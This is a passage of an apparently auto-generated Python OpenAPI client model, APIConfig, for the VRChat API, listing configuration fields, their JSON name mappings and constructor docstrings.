'plugin': (str,), # noqa: E501
'release_app_version_standalone': (str,), # noqa: E501
'release_sdk_url': (str,), # noqa: E501
'release_sdk_version': (str,), # noqa: E501
'release_server_version_standalone': (str,), # noqa: E501
'sdk_developer_faq_url': (str,), # noqa: E501
'sdk_discord_url': (str,), # noqa: E501
'sdk_not_allowed_to_publish_message': (str,), # noqa: E501
'sdk_unity_version': (str,), # noqa: E501
'server_name': (str,), # noqa: E501
'support_email': (str,), # noqa: E501
'time_out_world_id': (WorldID,), # noqa: E501
'tutorial_world_id': (WorldID,), # noqa: E501
'update_rate_ms_maximum': (int,), # noqa: E501
'update_rate_ms_minimum': (int,), # noqa: E501
'update_rate_ms_normal': (int,), # noqa: E501
'update_rate_ms_udon_manual': (int,), # noqa: E501
'upload_analysis_percent': (int,), # noqa: E501
'url_list': ([str],), # noqa: E501
'use_reliable_udp_for_voice': (bool,), # noqa: E501
'user_update_period': (int,), # noqa: E501
'user_verification_delay': (int,), # noqa: E501
'user_verification_retry': (int,), # noqa: E501
'user_verification_timeout': (int,), # noqa: E501
'vive_windows_url': (str,), # noqa: E501
'white_listed_asset_urls': ([str],), # noqa: E501
'world_update_period': (int,), # noqa: E501
'youtubedl_hash': (str,), # noqa: E501
'youtubedl_version': (str,), # noqa: E501
}
@cached_property
def discriminator():
return None
attribute_map = {
'voice_enable_degradation': 'VoiceEnableDegradation', # noqa: E501
'voice_enable_receiver_limiting': 'VoiceEnableReceiverLimiting', # noqa: E501
'address': 'address', # noqa: E501
'announcements': 'announcements', # noqa: E501
'api_key': 'apiKey', # noqa: E501
'app_name': 'appName', # noqa: E501
'build_version_tag': 'buildVersionTag', # noqa: E501
'client_api_key': 'clientApiKey', # noqa: E501
'client_bps_ceiling': 'clientBPSCeiling', # noqa: E501
'client_disconnect_timeout': 'clientDisconnectTimeout', # noqa: E501
'client_reserved_player_bps': 'clientReservedPlayerBPS', # noqa: E501
'client_sent_count_allowance': 'clientSentCountAllowance', # noqa: E501
'contact_email': 'contactEmail', # noqa: E501
'copyright_email': 'copyrightEmail', # noqa: E501
'current_tos_version': 'currentTOSVersion', # noqa: E501
'default_avatar': 'defaultAvatar', # noqa: E501
'deployment_group': 'deploymentGroup', # noqa: E501
'dev_app_version_standalone': 'devAppVersionStandalone', # noqa: E501
'dev_download_link_windows': 'devDownloadLinkWindows', # noqa: E501
'dev_sdk_url': 'devSdkUrl', # noqa: E501
'dev_sdk_version': 'devSdkVersion', # noqa: E501
'dev_server_version_standalone': 'devServerVersionStandalone', # noqa: E501
'dis_countdown': 'dis-countdown', # noqa: E501
'disable_avatar_copying': 'disableAvatarCopying', # noqa: E501
'disable_avatar_gating': 'disableAvatarGating', # noqa: E501
'disable_community_labs': 'disableCommunityLabs', # noqa: E501
'disable_community_labs_promotion': 'disableCommunityLabsPromotion', # noqa: E501
'disable_email': 'disableEmail', # noqa: E501
'disable_event_stream': 'disableEventStream', # noqa: E501
'disable_feedback_gating': 'disableFeedbackGating', # noqa: E501
'disable_frontend_builds': 'disableFrontendBuilds', # noqa: E501
'disable_hello': 'disableHello', # noqa: E501
'disable_oculus_subs': 'disableOculusSubs', # noqa: E501
'disable_registration': 'disableRegistration', # noqa: E501
'disable_steam_networking': 'disableSteamNetworking', # noqa: E501
'disable_two_factor_auth': 'disableTwoFactorAuth', # noqa: E501
'disable_udon': 'disableUdon', # noqa: E501
'disable_upgrade_account': 'disableUpgradeAccount', # noqa: E501
'download_link_windows': 'downloadLinkWindows', # noqa: E501
'download_urls': 'downloadUrls', # noqa: E501
'dynamic_world_rows': 'dynamicWorldRows', # noqa: E501
'events': 'events', # noqa: E501
'gear_demo_room_id': 'gearDemoRoomId', # noqa: E501
'home_world_id': 'homeWorldId', # noqa: E501
'homepage_redirect_target': 'homepageRedirectTarget', # noqa: E501
'hub_world_id': 'hubWorldId', # noqa: E501
'jobs_email': 'jobsEmail', # noqa: E501
'message_of_the_day': 'messageOfTheDay', # noqa: E501
'moderation_email': 'moderationEmail', # noqa: E501
'moderation_query_period': 'moderationQueryPeriod', # noqa: E501
'not_allowed_to_select_avatar_in_private_world_message': 'notAllowedToSelectAvatarInPrivateWorldMessage', # noqa: E501
'plugin': 'plugin', # noqa: E501
'release_app_version_standalone': 'releaseAppVersionStandalone', # noqa: E501
'release_sdk_url': 'releaseSdkUrl', # noqa: E501
'release_sdk_version': 'releaseSdkVersion', # noqa: E501
'release_server_version_standalone': 'releaseServerVersionStandalone', # noqa: E501
'sdk_developer_faq_url': 'sdkDeveloperFaqUrl', # noqa: E501
'sdk_discord_url': 'sdkDiscordUrl', # noqa: E501
'sdk_not_allowed_to_publish_message': 'sdkNotAllowedToPublishMessage', # noqa: E501
'sdk_unity_version': 'sdkUnityVersion', # noqa: E501
'server_name': 'serverName', # noqa: E501
'support_email': 'supportEmail', # noqa: E501
'time_out_world_id': 'timeOutWorldId', # noqa: E501
'tutorial_world_id': 'tutorialWorldId', # noqa: E501
'update_rate_ms_maximum': 'updateRateMsMaximum', # noqa: E501
'update_rate_ms_minimum': 'updateRateMsMinimum', # noqa: E501
'update_rate_ms_normal': 'updateRateMsNormal', # noqa: E501
'update_rate_ms_udon_manual': 'updateRateMsUdonManual', # noqa: E501
'upload_analysis_percent': 'uploadAnalysisPercent', # noqa: E501
'url_list': 'urlList', # noqa: E501
'use_reliable_udp_for_voice': 'useReliableUdpForVoice', # noqa: E501
'user_update_period': 'userUpdatePeriod', # noqa: E501
'user_verification_delay': 'userVerificationDelay', # noqa: E501
'user_verification_retry': 'userVerificationRetry', # noqa: E501
'user_verification_timeout': 'userVerificationTimeout', # noqa: E501
'vive_windows_url': 'viveWindowsUrl', # noqa: E501
'white_listed_asset_urls': 'whiteListedAssetUrls', # noqa: E501
'world_update_period': 'worldUpdatePeriod', # noqa: E501
'youtubedl_hash': 'youtubedl-hash', # noqa: E501
'youtubedl_version': 'youtubedl-version', # noqa: E501
}
read_only_vars = {
}
_composed_schemas = {}
@classmethod
@convert_js_args_to_python_args
def _from_openapi_data(cls, address, announcements, api_key, build_version_tag, client_api_key, contact_email, copyright_email, current_tos_version, default_avatar, deployment_group, dev_app_version_standalone, dev_download_link_windows, dev_sdk_url, dev_sdk_version, dev_server_version_standalone, dis_countdown, download_link_windows, download_urls, dynamic_world_rows, events, gear_demo_room_id, home_world_id, hub_world_id, jobs_email, message_of_the_day, moderation_email, moderation_query_period, not_allowed_to_select_avatar_in_private_world_message, plugin, release_app_version_standalone, release_sdk_url, release_sdk_version, release_server_version_standalone, sdk_developer_faq_url, sdk_discord_url, sdk_not_allowed_to_publish_message, sdk_unity_version, server_name, support_email, time_out_world_id, tutorial_world_id, update_rate_ms_maximum, update_rate_ms_minimum, update_rate_ms_normal, update_rate_ms_udon_manual, upload_analysis_percent, url_list, user_update_period, user_verification_delay, user_verification_retry, user_verification_timeout, vive_windows_url, white_listed_asset_urls, world_update_period, youtubedl_hash, youtubedl_version, *args, **kwargs): # noqa: E501
"""APIConfig - a model defined in OpenAPI
Args:
address (str): VRChat's office address
announcements ([PublicAnnouncement]): Public Announcements
api_key (str): apiKey to be used for all other requests
build_version_tag (str): Build tag of the API server
client_api_key (str): apiKey to be used for all other requests
contact_email (str): VRChat's contact email
copyright_email (str): VRChat's copyright-issues-related email
current_tos_version (int): Current version number of the Terms of Service
default_avatar (AvatarID):
deployment_group (DeploymentGroup):
dev_app_version_standalone (str): Version number for game development build
dev_download_link_windows (str): Developer Download link
dev_sdk_url (str): Link to download the development SDK, use downloadUrls instead
dev_sdk_version (str): Version of the development SDK
dev_server_version_standalone (str): Version number for server development build
dis_countdown (datetime): Unknown, \"dis\" maybe for disconnect?
download_link_windows (str): Download link for game on the Oculus Rift website.
download_urls (DownloadURLList):
dynamic_world_rows ([DynamicContentRow]): Array of DynamicWorldRow objects, used by the game to display the list of world rows
events (APIEventConfig):
gear_demo_room_id (str): Unknown
home_world_id (WorldID):
hub_world_id (WorldID):
jobs_email (str): VRChat's job application email
message_of_the_day (str): MOTD
moderation_email (str): VRChat's moderation related email
moderation_query_period (int): Unknown
not_allowed_to_select_avatar_in_private_world_message (str): Used in-game to notify a user they aren't allowed to select avatars in private worlds
plugin (str): Extra [plugin](https://doc.photonengine.com/en-us/server/current/plugins/manual) to run in each instance
release_app_version_standalone (str): Version number for game release build
release_sdk_url (str): Link to download the release SDK
release_sdk_version (str): Version of the release SDK
release_server_version_standalone (str): Version number for server release build
sdk_developer_faq_url (str): Link to the developer FAQ
sdk_discord_url (str): Link to the official VRChat Discord
sdk_not_allowed_to_publish_message (str): Used in the SDK to notify a user they aren't allowed to upload avatars/worlds yet
sdk_unity_version (str): Unity version supported by the SDK
server_name (str): Server name of the API server currently responding
support_email (str): VRChat's support email
time_out_world_id (WorldID):
tutorial_world_id (WorldID):
update_rate_ms_maximum (int): Unknown
update_rate_ms_minimum (int): Unknown
update_rate_ms_normal (int): Unknown
update_rate_ms_udon_manual (int): Unknown
upload_analysis_percent (int): Unknown
url_list ([str]): List of allowed URLs that bypass the \"Allow untrusted URL's\" setting in-game
user_update_period (int): Unknown
user_verification_delay (int): Unknown
user_verification_retry (int): Unknown
user_verification_timeout (int): Unknown
vive_windows_url (str): Download link for game on the Steam website.
white_listed_asset_urls ([str]): List of allowed URLs that are allowed to host avatar assets
world_update_period (int): Unknown
youtubedl_hash (str): Currently used youtube-dl.exe hash in SHA-256-delimited format
youtubedl_version (str): Currently used youtube-dl.exe version
Keyword Args:
voice_enable_degradation (bool): Unknown, probably voice optimization testing. defaults to False # noqa: E501
voice_enable_receiver_limiting (bool): Unknown, probably voice optimization testing. defaults to True # noqa: E501
app_name (str): Game name. defaults to "VrChat" # noqa: E501
client_bps_ceiling (int): Unknown. defaults to 18432 # noqa: E501
client_disconnect_timeout (int): Unknown. defaults to 30000 # noqa: E501
client_reserved_player_bps (int): Unknown. defaults to 7168 # noqa: E501
client_sent_count_allowance (int): Unknown. defaults to 15 # noqa: E501
disable_avatar_copying (bool): Toggles if copying avatars should be disabled. defaults to False # noqa: E501
disable_avatar_gating (bool): Toggles if avatar gating should be disabled. Avatar gating restricts uploading of avatars to people with the `system_avatar_access` Tag or `admin_avatar_access` Tag. defaults to False # noqa: E501
disable_community_labs (bool): Toggles if the Community Labs should be disabled. defaults to False # noqa: E501
disable_community_labs_promotion (bool): Toggles if promotion out of Community Labs should be disabled. defaults to False # noqa: E501
disable_email (bool): Unknown. defaults to False # noqa: E501
disable_event_stream (bool): Toggles if Analytics should be disabled.. defaults to False # noqa: E501
disable_feedback_gating (bool): Toggles if feedback gating should be disabled. Feedback gating restricts submission of feedback (reporting a World or User) to people with the `system_feedback_access` Tag.. defaults to False # noqa: E501
disable_frontend_builds (bool): Unknown, probably toggles compilation of frontend web builds? So internal flag?. defaults to False # noqa: E501
disable_hello (bool): Unknown. defaults to False # noqa: E501
disable_oculus_subs (bool): Toggles if signing up for Subscriptions in Oculus is disabled or not.. defaults to False # noqa: E501
disable_registration (bool): Toggles if new user account registration should be disabled.. defaults to False # noqa: E501
disable_steam_networking (bool): Toggles if Steam Networking should be disabled. VRChat these days uses Photon Unity Networking (PUN) instead.. defaults to True # noqa: E501
disable_two_factor_auth (bool): Toggles if 2FA should be disabled.. defaults to False # noqa: E501
disable_udon (bool): Toggles if Udon should be universally disabled in-game.. defaults to False # noqa: E501
disable_upgrade_account (bool): Toggles if account upgrading \"linking with Steam/Oculus\" should be disabled.. defaults to False # noqa: E501
homepage_redirect_target (str): Redirect target if you try to open the base API domain in your browser. defaults to "https://hello.vrchat.com" # noqa: E501
use_reliable_udp_for_voice (bool): Unknown. defaults to False # noqa: E501
_check_type (bool): if True, values for parameters in openapi_types
will be type checked and a TypeError will be
raised if the wrong type is input.
Defaults to True
_path_to_item (tuple/list): This is a list of keys or values to
drill down to the model in received_data
when deserializing a response
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_configuration (Configuration): the instance to use when
deserializing a file_type parameter.
If passed, type conversion is attempted
If omitted no type conversion is done.
_visited_composed_classes (tuple): This stores a tuple of
classes that we have traveled through so that
if we see that class again we will not use its
discriminator again.
When traveling through a discriminator, the
composed schema that is
is traveled through is added to this set.
For example if Animal has a discriminator
petType and we pass in "Dog", and the class Dog
allOf includes Animal, we move through Animal
once using the discriminator, and pick Dog.
Then in Dog, we will make an instance of the
Animal class but this time we won't travel
through its discriminator because we passed in
_visited_composed_classes = (Animal,)
"""
voice_enable_degradation = kwargs.get('voice_enable_degradation', False)
voice_enable_receiver_limiting = kwargs.get('voice_enable_receiver_limiting', True)
app_name = kwargs.get('app_name', "VrChat")
client_bps_ceiling = kwargs.get('client_bps_ceiling', 18432)
client_disconnect_timeout = kwargs.get('client_disconnect_timeout', 30000)
client_reserved_player_bps = kwargs.get('client_reserved_player_bps', 7168)
client_sent_count_allowance = kwargs.get('client_sent_count_allowance', 15)
disable_avatar_copying = kwargs.get('disable_avatar_copying', False)
disable_avatar_gating = kwargs.get('disable_avatar_gating', False)
disable_community_labs = kwargs.get('disable_community_labs', False)
disable_community_labs_promotion = kwargs.get('disable_community_labs_promotion', False)
disable_email = kwargs.get('disable_email', False)
disable_event_stream = kwargs.get('disable_event_stream', False)
disable_feedback_gating = kwargs.get('disable_feedback_gating', False)
disable_frontend_builds = kwargs.get('disable_frontend_builds', False)
disable_hello = kwargs.get('disable_hello', False)
disable_oculus_subs = kwargs.get('disable_oculus_subs', False)
disable_registration = kwargs.get('disable_registration', False)
disable_steam_networking = kwargs.get('disable_steam_networking', True)
disable_two_factor_auth = kwargs.get('disable_two_factor_auth', False)
disable_udon = kwargs.get('disable_udon', False)
disable_upgrade_account = kwargs.get('disable_upgrade_account', False)
homepage_redirect_target = kwargs.get('homepage_redirect_target', "https://hello.vrchat.com")
use_reliable_udp_for_voice = kwargs.get('use_reliable_udp_for_voice', False)
_check_type = kwargs.pop('_check_type', True)
_spec_property_naming = kwargs.pop('_spec_property_naming', False)
_path_to_item = kwargs.pop('_path_to_item', ())
_configuration = kwargs.pop('_configuration', None)
_visited_composed_classes = kwargs.pop('_visited_composed_classes', ())
self = super(OpenApiModel, cls).__new__(cls)
if args:
raise ApiTypeError(
"Invalid positional arguments=%s passed to %s. Remove those invalid positional arguments." % (
args,
self.__class__.__name__,
),
path_to_item=_path_to_item,
valid_classes=(self.__class__,),
)
self._data_store = {}
self._check_type = _check_type
self._spec_property_naming = _spec_property_naming
self._path_to_item = _path_to_item
self._configuration = _configuration
self._visited_composed_classes = _visited_composed_classes + (self.__class__,)
self.voice_enable_degradation = voice_enable_degradation
self.voice_enable_receiver_limiting = voice_enable_receiver_limiting
self.address = address
self.announcements = announcements
self.api_key = api_key
self.app_name = app_name
self.build_version_tag = build_version_tag
self.client_api_key = client_api_key
self.client_bps_ceiling = client_bps_ceiling
self.client_disconnect_timeout = client_disconnect_timeout
self.client_reserved_player_bps = client_reserved_player_bps
self.client_sent_count_allowance = client_sent_count_allowance
self.contact_email = contact_email
self.copyright_email = copyright_email
self.current_tos_version = current_tos_version
self.default_avatar = default_avatar
self.deployment_group = deployment_group
self.dev_app_version_standalone = dev_app_version_standalone
self.dev_download_link_windows = dev_download_link_windows
self.dev_sdk_url = dev_sdk_url
self.dev_sdk_version = dev_sdk_version
self.dev_server_version_standalone = dev_server_version_standalone
self.dis_countdown = dis_countdown
self.disable_avatar_copying = disable_avatar_copying
self.disable_avatar_gating = disable_avatar_gating
self.disable_community_labs = disable_community_labs
self.disable_community_labs_promotion = disable_community_labs_promotion
self.disable_email = disable_email
self.disable_event_stream = disable_event_stream
self.disable_feedback_gating = disable_feedback_gating
self.disable_frontend_builds = disable_frontend_builds
self.disable_hello = disable_hello
self.disable_oculus_subs = disable_oculus_subs
self.disable_registration = disable_registration
self.disable_steam_networking = disable_steam_networking
self.disable_two_factor_auth = disable_two_factor_auth
self.disable_udon = disable_udon
self.disable_upgrade_account = disable_upgrade_account
self.download_link_windows = download_link_windows
self.download_urls = download_urls
self.dynamic_world_rows = dynamic_world_rows
self.events = events
self.gear_demo_room_id = gear_demo_room_id
self.home_world_id = home_world_id
self.homepage_redirect_target = homepage_redirect_target
self.hub_world_id = hub_world_id
self.jobs_email = jobs_email
self.message_of_the_day = message_of_the_day
self.moderation_email = moderation_email
self.moderation_query_period = moderation_query_period
self.not_allowed_to_select_avatar_in_private_world_message = not_allowed_to_select_avatar_in_private_world_message
self.plugin = plugin
self.release_app_version_standalone = release_app_version_standalone
self.release_sdk_url = release_sdk_url
self.release_sdk_version = release_sdk_version
self.release_server_version_standalone = release_server_version_standalone
self.sdk_developer_faq_url = sdk_developer_faq_url
self.sdk_discord_url = sdk_discord_url
self.sdk_not_allowed_to_publish_message = sdk_not_allowed_to_publish_message
self.sdk_unity_version = sdk_unity_version
self.server_name = server_name
self.support_email = support_email
self.time_out_world_id = time_out_world_id
self.tutorial_world_id = tutorial_world_id
self.update_rate_ms_maximum = update_rate_ms_maximum
self.update_rate_ms_minimum = update_rate_ms_minimum
self.update_rate_ms_normal = update_rate_ms_normal
self.update_rate_ms_udon_manual = update_rate_ms_udon_manual
self.upload_analysis_percent = upload_analysis_percent
self.url_list = url_list
self.use_reliable_udp_for_voice = use_reliable_udp_for_voice
self.user_update_period = user_update_period
self.user_verification_delay = user_verification_delay
self.user_verification_retry = user_verification_retry
self.user_verification_timeout = user_verification_timeout
self.vive_windows_url = vive_windows_url
self.white_listed_asset_urls = white_listed_asset_urls
self.world_update_period = world_update_period
self.youtubedl_hash = youtubedl_hash
self.youtubedl_version = youtubedl_version
for var_name, var_value in kwargs.items():
if var_name not in self.attribute_map and \
self._configuration is not None and \
self._configuration.discard_unknown_keys and \
self.additional_properties_type is None:
# discard variable.
continue
setattr(self, var_name, var_value)
return self
required_properties = set([
'_data_store',
'_check_type',
'_spec_property_naming',
'_path_to_item',
'_configuration',
'_visited_composed_classes',
])
@convert_js_args_to_python_args
def __init__(self, address, announcements, api_key, build_version_tag, client_api_key, contact_email, copyright_email, current_tos_version, default_avatar, deployment_group, dev_app_version_standalone, dev_download_link_windows, dev_sdk_url, dev_sdk_version, dev_server_version_standalone, dis_countdown, download_link_windows, download_urls, dynamic_world_rows, events, gear_demo_room_id, home_world_id, hub_world_id, jobs_email, message_of_the_day, moderation_email, moderation_query_period, not_allowed_to_select_avatar_in_private_world_message, plugin, release_app_version_standalone, release_sdk_url, release_sdk_version, release_server_version_standalone, sdk_developer_faq_url, sdk_discord_url, sdk_not_allowed_to_publish_message, sdk_unity_version, server_name, support_email, time_out_world_id, tutorial_world_id, update_rate_ms_maximum, update_rate_ms_minimum, update_rate_ms_normal, update_rate_ms_udon_manual, upload_analysis_percent, url_list, user_update_period, user_verification_delay, user_verification_retry, user_verification_timeout, vive_windows_url, white_listed_asset_urls, world_update_period, youtubedl_hash, youtubedl_version, *args, **kwargs): # noqa: E501
"""APIConfig - a model defined in OpenAPI
Args:
address (str): VRChat's office address
announcements ([PublicAnnouncement]): Public Announcements
api_key (str): apiKey to be used for all other requests
build_version_tag (str): Build tag of the API server
client_api_key (str): apiKey to be used for all other requests
contact_email (str): VRChat's contact email
copyright_email (str): VRChat's copyright-issues-related email
current_tos_version (int): Current version number of the Terms of Service
default_avatar (AvatarID):
deployment_group (DeploymentGroup):
dev_app_version_standalone (str): Version number for game development build
dev_download_link_windows (str): Developer Download link
dev_sdk_url (str): Link to download the development SDK, use downloadUrls instead
dev_sdk_version (str): Version of the development SDK
dev_server_version_standalone (str): Version number for server development build
dis_countdown (datetime): Unknown, \"dis\" maybe for disconnect?
download_link_windows (str): Download link for game on the Oculus Rift website.
download_urls (DownloadURLList):
dynamic_world_rows ([DynamicContentRow]): Array of DynamicWorldRow objects, used by the game to display the list of world rows
events (APIEventConfig):
gear_demo_room_id (str): Unknown
home_world_id (WorldID):
hub_world_id (WorldID):
jobs_email (str): VRChat's job application email
message_of_the_day (str): MOTD
moderation_email (str): VRChat's moderation related email
moderation_query_period (int): Unknown
not_allowed_to_select_avatar_in_private_world_message (str): Used in-game to notify a user they aren't allowed to select avatars in private worlds
plugin (str): Extra [plugin](https://doc.photonengine.com/en-us/server/current/plugins/manual) to run in each instance
release_app_version_standalone (str): Version number for game release build
release_sdk_url (str): Link to download the release SDK
release_sdk_version (str): Version of the release SDK
release_server_version_standalone (str): Version number for server release build
sdk_developer_faq_url (str): Link to the developer FAQ
sdk_discord_url (str): Link to the official VRChat Discord
sdk_not_allowed_to_publish_message (str): Used in the SDK to notify a user they aren't allowed to upload avatars/worlds yet
sdk_unity_version (str): Unity version supported by the SDK
server_name (str): Server name of the API server currently responding
support_email (str): VRChat's support email
time_out_world_id (WorldID):
tutorial_world_id (WorldID):
update_rate_ms_maximum (int): Unknown
update_rate_ms_minimum (int): Unknown
update_rate_ms_normal (int): Unknown
update_rate_ms_udon_manual (int): Unknown
upload_analysis_percent (int): Unknown
url_list ([str]): List of allowed URLs that bypass the \"Allow untrusted URL's\" setting in-game
user_update_period (int): Unknown
user_verification_delay (int): Unknown
user_verification_retry (int): Unknown
user_verification_timeout (int): Unknown
vive_windows_url (str): Download link for game on the Steam website.
white_listed_asset_urls ([str]): List of allowed URLs that are allowed to host avatar assets
world_update_period (int): Unknown
youtubedl_hash (str): Currently used youtube-dl.exe hash in SHA-256-delimited format
youtubedl_version (str): Currently used youtube-dl.exe version
Keyword Args:
voice_enable_degradation (bool): Unknown, probably voice optimization testing. defaults to False # noqa: E501
voice_enable_receiver_limiting (bool): Unknown, probably voice optimization testing. defaults to True # noqa: E501
app_name (str): Game name. defaults to "VrChat" # noqa: E501
client_bps_ceiling (int): Unknown. defaults to 18432 # noqa: E501
client_disconnect_timeout (int): Unknown. defaults to 30000 # noqa: E501
client_reserved_player_bps (int): Unknown. defaults to 7168 # noqa: E501
client_sent_count_allowance (int): Unknown. defaults to 15 # noqa: E501
disable_avatar_copying (bool): Toggles if copying avatars should be disabled. defaults to False # noqa: E501
disable_avatar_gating (bool): Toggles if avatar gating should be disabled. Avatar gating restricts uploading of avatars to people with the `system_avatar_access` Tag or `admin_avatar_access` Tag. defaults to False # noqa: E501
disable_community_labs (bool): Toggles if the Community Labs should be disabled. defaults to False # noqa: E501
disable_community_labs_promotion (bool): Toggles if promotion out of Community Labs should be disabled. defaults to False # noqa: E501
disable_email (bool): Unknown. defaults to False # noqa: E501
disable_event_stream (bool): Toggles if Analytics should be disabled.. defaults to False # noqa: E501
disable_feedback_gating (bool): Toggles if feedback gating should be disabled. Feedback gating restricts submission of feedback (reporting a World or User) to people with the `system_feedback_access` Tag.. defaults to False # noqa: E501
disable_frontend_builds (bool): Unknown, probably toggles compilation of frontend web builds? So internal flag?. defaults to False # noqa: E501
disable_hello (bool): Unknown. defaults to False # noqa: E501
disable_oculus_subs (bool): Toggles if signing up for Subscriptions in Oculus is disabled or not.. defaults to False # noqa: E501
disable_registration (bool): Toggles if new user account registration should be disabled.. defaults to False # noqa: E501
disable_steam_networking (bool): Toggles if Steam Networking should be disabled. VRChat these days uses Photon Unity Networking (PUN) instead.. defaults to True # noqa: E501
disable_two_factor_auth (bool): Toggles if 2FA should be disabled.. defaults to False # noqa: E501
disable_udon (bool): Toggles if Udon should be universally disabled in-game.. defaults to False # noqa: E501
disable_upgrade_account (bool): Toggles if account upgrading \"linking with Steam/Oculus\" should be disabled.. defaults to False # noqa: E501
homepage_redirect_target (str): Redirect target if you try to open the base API domain in your browser. defaults to "https://hello.vrchat.com" # noqa: E501
use_reliable_udp_for_voice (bool): Unknown. defaults to False # noqa: E501
_check_type (bool): if True, values for parameters in openapi_types
will be type checked and a TypeError will be
raised if the wrong type is input.
Defaults to True
_path_to_item (tuple/list): This is a list of keys or values to
drill down to the model in received_data
when deserializing a response
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_configuration (Configuration): the instance to use when
deserializing a file_type parameter.
If passed, type conversion is attempted
If omitted no type conversion is done.
_visited_composed_classes (tuple): This stores a tuple of
classes that we have traveled through so that
if we see that class again we will not use its
discriminator again.
When traveling through a discriminator, the
composed schema that is
is traveled through is added to this set.
For example if Animal has a discriminator
petType and we pass in "Dog", and the class Dog
allOf includes Animal, we move through Animal
once using the discriminator, and pick Dog.
Then in Dog, we will make an instance of the
Animal class but this time we won't travel
through its discriminator because we passed in
_visited_composed_classes = (Animal,)
"""
voice_enable_degradation = kwargs.get('voice_enable_degradation', False)
voice_enable_receiver_limiting = kwargs.get('voice_enable_receiver_limiting', True)
app_name = kwargs.get('app_name', "VrChat")
client_bps_ceiling = kwargs.get('client_bps_ceiling', 18432)
client_disconnect_timeout = kwargs.get('client_disconnect_timeout', 30000)
client_reserved_player_bps = kwargs.get('client_reserved_player_bps', 7168)
client_sent_count_allowance = kwargs.get('client_sent_count_allowance', 15)
disable_avatar_copying = kwargs.get('disable_avatar_copying', False)
disable_avatar_gating = kwargs.get('disable_avatar_gating', False)
disable_community_labs = kwargs.get('disable_community_labs', False)
disable_community_labs_promotion = kwargs.get('disable_community_labs_promotion', False)
disable_email = kwargs.get('disable_email', False)
disable_event_stream = kwargs.get('disable_event_stream', False)
disable_feedback_gating = kwargs.get('disable_feedback_gating', False)
disable_frontend_builds = kwargs.get('disable_frontend_builds', False)
disable_hello = kwargs.get('disable_hello', False)
disable_oculus_subs = kwargs.get('disable_oculus_subs', False)
disable_registration = kwargs.get('disable_registration', False)
disable_steam_networking = kwargs.get('disable_steam_networking', True)
disable_two_factor_auth = kwargs.get('disable_two_factor_auth', False)
disable_udon = kwargs.get('disable_udon', False)
disable_upgrade_account = kwargs.get('disable_upgrade_account', False)
homepage_redirect_target = kwargs.get('homepage_redirect_target', "https://hello.vrchat.com")
use_reliable_udp_for_voice = kwargs.get('use_reliable_udp_for_voice', False)
_check_type = kwargs.pop('_check_type', True)
_spec_property_naming = kwargs.pop('_spec_property_naming', False)
_path_to_item = kwargs.pop('_path_to_item', ())
_configuration = kwargs.pop('_configuration', None)
_visited_composed_classes = kwargs.pop('_visited_composed_classes', ())
if args:
raise ApiTypeError(
"Invalid positional arguments=%s passed to %s. Remove those invalid positional arguments." % (
args,
self.__class__.__name__,
),
path_to_item=_path_to_item,
valid_classes=(self.__class__,),
)
self._data_store = {}
self._check_type = _check_type
self._spec_property_naming = _spec_property_naming
self._path_to_item = _path_to_item
self._configuration = _configuration
self._visited_composed_classes = _visited_composed_classes + (self.__class__,)
self.voice_enable_degradation = voice_enable_degradation
self.voice_enable_receiver_limiting = voice_enable_receiver_limiting
self.address = address
self.announcements = announcements
self.api_key = api_key
self.app_name = app_name
self.build_version_tag = build_version_tag
self.client_api_key = client_api_key
self.client_bps_ceiling = client_bps_ceiling
self.client_disconnect_timeout = client_disconnect_timeout
self.client_reserved_player_bps = client_reserved_player_bps
self.client_sent_count_allowance = client_sent_count_allowance
self.contact_email = contact_email
self.copyright_email = copyright_email
self.current_tos_version = current_tos_version
self.default_avatar = default_avatar
self.deployment_group = deployment_group
self.dev_app_version_standalone = dev_app_version_standalone
self.dev_download_link_windows = dev_download_link_windows
self.dev_sdk_url = dev_sdk_url
self.dev_sdk_version = dev_sdk_version
self.dev_server_version_standalone = dev_server_version_standalone
self.dis_countdown = dis_countdown
self.disable_avatar_copying = disable_avatar_copying
self.disable_avatar_gating = disable_avatar_gating
self.disable_community_labs = disable_community_labs
self.disable_community_labs_promotion = disable_community_labs_promotion
self.disable_email = disable_email
self.disable_event_stream = disable_event_stream
self.disable_feedback_gating = disable_feedback_gating
self.disable_frontend_builds = disable_frontend_builds
self.disable_hello = disable_hello
self.disable_oculus_subs = disable_oculus_subs
self.disable_registration = disable_registration
self.disable_steam_networking = disable_steam_networking
self.disable_two_factor_auth = disable_two_factor_auth
self.disable_udon = disable_udon
self.disable_upgrade_account = disable_upgrade_account
self.download_link_windows = download_link_windows
self.download_urls = download_urls
self.dynamic_world_rows = dynamic_world_rows
self.events = events
self.gear_demo_room_id = gear_demo_room_id
self.home_world_id = home_world_id
self.homepage_redirect_target = homepage_redirect_target
self.hub_world_id = hub_world_id
self.jobs_email = jobs_email
self.message_of_the_day = message_of_the_day
self.moderation_email = moderation_email
self.moderation_query_period = moderation_query_period
self.not_allowed_to_select_avatar_in_private_world_message = not_allowed_to_select_avatar_in_private_world_message
self.plugin = plugin
self.release_app_version_standalone = release_app_version_standalone
self.release_sdk_url = release_sdk_url
self.release_sdk_version = release_sdk_version
self.release_server_version_standalone = release_server_version_standalone
self.sdk_developer_faq_url = sdk_developer_faq_url
self.sdk_discord_url = sdk_discord_url
self.sdk_not_allowed_to_publish_message = sdk_not_allowed_to_publish_message
self.sdk_unity_version = sdk_unity_version
self.server_name = server_name
self.support_email = support_email
self.time_out_world_id = time_out_world_id
self.tutorial_world_id = tutorial_world_id
self.update_rate_ms_maximum = update_rate_ms_maximum
self.update_rate_ms_minimum = update_rate_ms_minimum
self.update_rate_ms_normal = update_rate_ms_normal
self.update_rate_ms_udon_manual = update_rate_ms_udon_manual
self.upload_analysis_percent = upload_analysis_percent
self.url_list = url_list
self.use_reliable_udp_for_voice = use_reliable_udp_for_voice
self.user_update_period = user_update_period
self.user_verification_delay = user_verification_delay
self.user_verification_retry = user_verification_retry
self.user_verification_timeout = user_verification_timeout
self.vive_windows_url = vive_windows_url
self.white_listed_asset_urls = white_listed_asset_urls
self.world_update_period = world_update_period
self.youtubedl_hash = youtubedl_hash
self.youtubedl_version = youtubedl_version
for var_name, var_value in kwargs.items():
if var_name not in self.attribute_map and \
self._configuration is not None and \
self._configuration.discard_unknown_keys and \
self.additional_properties_type is None:
# discard variable.
continue
setattr(self, var_name, var_value)
